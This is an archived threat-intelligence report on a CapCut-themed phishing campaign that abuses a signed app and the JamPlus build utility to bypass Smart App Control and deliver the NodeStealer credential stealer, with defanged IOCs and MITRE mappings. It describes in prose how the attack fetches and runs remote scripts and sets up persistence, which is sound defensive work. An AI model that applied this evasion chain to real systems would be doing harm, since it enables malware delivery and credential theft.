{ "id": "e51aa615-020a-4c43-a29d-9a3e43c13323", "created_at": "2026-04-06T00:19:30.929217Z", "updated_at": "2026-04-10T03:36:47.849515Z", "deleted_at": null, "sha1_hash": "3f05e5ce52648d0cf92977b9c8e8b81bd8d2ae93", "title": "JamPlus: Bypassing Smart App Control Via Reputation Hijack", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1033916, "plain_text": "JamPlus: Bypassing Smart App Control Via Reputation Hijack\r\nPublished: 2024-09-09 · Archived: 2026-04-05 17:20:52 UTC\r\nCyble analyzes how threat actors utilize reputation Hijacking and JamPlus Utility to bypass Smart App Control (SAC),\r\nenabling seamless delivery of malicious payloads like stealers.\r\nKey takeaways\r\nCyble Research and Intelligence Labs (CRIL) has detected a phishing site masquerading as a CapCut download page.\r\nThe site aims to trick users into downloading malicious software.\r\nThreat actors (TAs) have leveraged a reputation-hijacking technique by embedding a legitimate CapCut-signed\r\napplication within the malicious downloaded package, exploiting the trustworthiness of well-known apps to bypass\r\nsecurity systems.\r\nThis campaign utilizes a recently demonstrated proof-of-concept (PoC) that repurposes the JamPlus build utility to\r\nexecute malicious scripts while evading detection.\r\nThe attack unfolds in multiple stages, employing a mix of legitimate tools, fileless methods, and reputed code\r\nrepositories such as GitHub to seem legitimate and effectively circumvent traditional security measures.\r\nThis campaign’s final payload is a variant of NodeStealer, designed to capture sensitive user information and\r\nexfiltrate it through a Telegram channel.\r\nOverview\r\nCapCut, a video editing tool developed by Bytedance, has become increasingly popular. This popularity has extended to\r\nCapCut-themed attacks, which are on the rise among TAs. These themes have been frequently used in phishing campaigns.\r\nCyble Research \u0026 Intelligence Labs (CRIL) previously identified several phishing websites impersonating the CapCut video\r\neditor, and we have discussed these findings in our earlier blog posts. Our latest research discovers a new CapCut-themed\r\ncampaign deploying stealers such as NodeStealer.\r\nAdditionally, TAs have adopted a recently identified technique of reputation hijacking with the JamPlus build utility to\r\ndeliver final payloads to victims’ systems. This new tactic highlights an evolving trend in attack strategies aimed at\r\nbypassing security controls and increasing the success rate of malicious campaigns.\r\nThe initial infection occurs when a user downloads a malicious package from a CapCut phishing site. The package contains\r\na legitimate CapCut application, JamPlus build utility, and a malicious”.lua” script. When the user runs the legitimate\r\nCapCut application, it triggers the JamPlus build utility, which then executes a malicious “.lua” script. This process utilizes\r\nreputation hijacking to mask the execution of the malicious script. This script then downloads a batch file that subsequently\r\nfetches and executes the final payload from a remote server. The TAs aim to maintain fileless payloads wherever possible.\r\nWorld's Best AI-Native Threat Intelligence\r\nThis multi-stage process ultimately deploys a stealer payload that resembles NodeStealer. The image below provides an\r\noverview of the infection chain.\r\nhttps://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/\r\nPage 1 of 7\n\nFigure 1 – Infection chain\r\nTechnical Details\r\nIn this campaign, TAs trick users into downloading a malicious package disguised as a CapCut installer from a phishing site,\r\nas shown below.\r\nFigure 2 – Phishing site\r\nWhen the user clicks the “Download” button on the phishing site, it initiates the download of an archive named\r\n“CapCut_{random number}_Installer” from the URL:\r\n“hxxps://www[.]dropbox[.]com/scl/fi/6se0kgmo7sbngtdf8r11x/CapCut_7376550521366298640_installer.zip?\r\nrlkey=7fxladl3fdhpne6p7buz48kcl\u0026st=pzxtrcqc\u0026dl=1”.\r\n \r\nUpon extracting the downloaded archive, the user encounters what appears to be a CapCut installer; however, it is a\r\nlegitimate CapCut application rather than an installer, as shown in Figure 3. The package also includes hidden files intended\r\nhttps://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/\r\nPage 2 of 7\n\nfor malicious activities.\r\nFigure 3 – Zip file contents without hidden files\r\nAfter revealing the hidden files, we discovered that the package contains the JamPlus build utility and a malicious “.lua”\r\nscript, as shown below.\r\nFigure 4 – Extracted content, including hidden files\r\nBy default, launching the CapCut shortcut from the desktop runs the CapCut application located at “C:\\Users\\\r\n\u003cUser_Name\u003e\\AppData\\Local\\CapCut\\Apps\\capcut.exe”. This “capcut.exe” file identifies the latest CapCut application\r\nversion and then executes the appropriate application from the corresponding folder, as shown below.\r\nFigure 5 – Execution Flow of  legitimate CapCut Application\r\nIn this campaign, TA leveraged this technique by trying to execute a renamed JamPlus build utility instead of the actual\r\nCapCut application, as shown below.\r\nhttps://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/\r\nPage 3 of 7\n\nFigure 6 – CapCut application executing JamPlus Build Utility\r\nIn our tests, the JamPlus utility was not executed because the file did not have the expected name, “capcut.exe,” indicating a\r\npossible error by the TA in naming the file. However, renaming the file to “capcut.exe” successfully triggers the execution of\r\nthe JamPlus Build utility.\r\nUpon successful execution, the builder reads instructions from a “. jam” file, which is configured to identify the malicious\r\n“.lua” script, as shown below.\r\nFigure 7 – Contents of the .jam file\r\nAfter identifying the malicious “.lua” script, the JamPlus build utility loads the “.lua” script file, which executes a shell\r\ncommand, as shown in the figure below. This command employs “curl” to silently download a batch file from a remote\r\nserver and save it as “C:\\Users\\Public\\steal.bat.” It then executes the downloaded batch file.\r\nThis approach demonstrates how TAs utilized a legitimate CapCut application with JamPlus build utility to evade Smart App\r\nControl and avoid triggering security alerts.\r\nFigure 8 – Content of the .Lua file\r\nThe batch file contains multiple PowerShell commands that perform the following actions:\r\nhttps://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/\r\nPage 4 of 7\n\n1. Downloads a file named “WindowSafety.bat” from a remote URL\r\n“hxxps://raw[.]githubusercontent.com/LoneNone1807/batman/main/startup” and saves it in the startup folder, ensuring it\r\nruns automatically at the next system startup.\r\n2. Downloads a ZIP file named “Document.zip” from another remote URL\r\n“hxxps://github[.]com/LoneNone1807/batman/raw/main/Document.zip” and saves it in the public directory\r\n(C:\\Users\\Public\\Document.zip).\r\n3. Extracts the contents of “Document.zip” into a folder named “Document” within the public directory\r\n(“C:\\Users\\Public\\Document”).\r\n4. Finally, the batch script executes a Python script named “sim.py”, located in the extracted folder.\r\nThe image below shows the contents of the Python script.\r\nFigure 9 – sim.py contents\r\nThe newly launched Python script retrieves base64-encoded data from a new remote server, as highlighted in the above\r\nimage, decodes it, and executes the resulting payload directly in memory without saving it to disk. This payload is a Python-based information-stealing malware identified as NodeStealer.\r\nNodeStealer\r\nNodeStealer is a sophisticated malware that targets a wide range of sensitive data on a victim’s machine. It steals login\r\ncredentials, cookies, credit card details, and autofill data from both Chromium-based and Gecko-based web browsers.\r\nAdditionally, it extracts information from Facebook Ads Manager, Facebook Business accounts, and Facebook API graph\r\npages. NodeStealer also targets browser extensions, including crypto wallets, password managers, VPNs, and gaming\r\napplications. All the collected information is then exfiltrated to the TAs via Telegram. This attack has been attributed to a\r\nthreat actor operating from Vietnam.\r\nBroader pattern of attacks\r\nWe have also identified another campaign where TAs used similar techniques to deliver RedLine Stealer. In this campaign,\r\nthey employed a legitimately signed Postman application in conjunction with the JamPlus build utility. The image below\r\nshows that the malicious package includes the Postman application.\r\nFigure 10 – Postman application used in a similar campaign\r\nConclusion\r\nhttps://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/\r\nPage 5 of 7\n\nThe successful hijacking of reputable applications and the JamPlus build utility illustrates a sophisticated method for\r\nbypassing Smart App Control without triggering security alerts. This approach significantly elevates the complexity and\r\neffectiveness of cyberattacks, complicating detection and defense efforts. The deployment of NodeStealer, which targets\r\nsensitive information from the victim’s system, highlights the growing concerns and difficulties within the cybersecurity\r\nlandscape.\r\nRecommendations\r\nBefore accessing or downloading from any site, it is essential to diligently verify the URLs.\r\nConsider disabling or limiting the execution of scripting languages on user workstations and servers if they are not\r\nessential for legitimate purposes.\r\nImplement comprehensive monitoring and logging to detect unusual activities associated with reputable applications.\r\nEmploy application whitelisting to ensure that only approved applications can run on systems. This helps prevent\r\nunauthorized applications from executing.\r\nStay updated with the latest threat intelligence and cybersecurity trends to understand new tactics and techniques\r\nused by attackers. This knowledge helps in adapting defense strategies accordingly.\r\nSet up network-level monitoring to detect unusual activities or data exfiltration by malware. Block suspicious\r\nactivities to prevent potential breaches.\r\nMITRE ATT\u0026CK® Techniques\r\nTactic  Technique ID  Technique Name \r\nInitial Access (TA0027) Phishing (T1660) Malware distribution via phishing site\r\nExecution  (TA0002)  User Execution (T1204)\r\nThe user needs to manually execute the file\r\ndownloaded from the phishing site. \r\nExecution (TA0002) Python (T1059.006)  \r\nPython stealer is used for targeting Windows\r\nusers \r\nDefense  Evasion \r\n(TA0005)\r\nMasquerading (T1036.008)\r\nDownloads file disguised as a legitimate\r\napplication.\r\nCredential Access\r\n(TA0006)\r\nSteal Web Session\r\nCookie (T1539) \r\nSteals browser cookies \r\nCollection (TA0009)\r\nArchive Collected Data \r\n(T1560) \r\nStealer compresses the stolen data with  \r\nZIP extension.\r\nExfiltration(TA0010)\r\nExfiltration Over Web\r\nService (T1567)\r\nUses Telegram channel to exfiltrate data\r\nIndicators of Compromise (IOCs)\r\nIndicators   \r\nIndicator  \r\nType  \r\nDescription  \r\n8e6bbe8ac1ecdd230a4dcafa981ff00663fae06f7b85b117a87917b6f04f894f SHA256 CapCut_7376550521366298640_i\r\n4e213bd0a127f1bb24c4c0d971c2727097b04eed9c6e62a57110d168ccc3ba10 SHA256 JamPlus Builder – POC file\r\n56d3ba2b661e8d8dfe38bcef275547546b476c35d18aa4ec89eea73c2e2aeb7c SHA256 Python Stealer\r\nhxxps://raw[.]githubusercontent[.]com/LoneNone1807/batman/main/steal[.]bat URL Remote server\r\nhxxps://cap-cutdownload[.]com/ URL Phishing site\r\n169f7d182f7838b75737c23e1b08c4b6b303d2d6a1cb73cdb87bd9644878a027 SHA256 Copyright-infringement-images.zip\r\nhttps://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/\r\nPage 6 of 7\n\nReferences\r\nhttps://www.netskope.com/blog/new-python-nodestealer-goes-beyond-facebook-credentials-now-stealing-all-browser-cookies-and-login-credentials\r\nhttps://isc.sans.edu/diary/From+Highly+Obfuscated+Batch+File+to+XWorm+and+Redline/31204\r\nhttps://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business\r\nhttps://www.elastic.co/security-labs/dismantling-smart-app-control\r\nSource: https://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/\r\nhttps://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/" ], "report_names": [ "reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434770, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3f05e5ce52648d0cf92977b9c8e8b81bd8d2ae93.pdf", "text": "https://archive.orkl.eu/3f05e5ce52648d0cf92977b9c8e8b81bd8d2ae93.txt", "img": "https://archive.orkl.eu/3f05e5ce52648d0cf92977b9c8e8b81bd8d2ae93.jpg" } }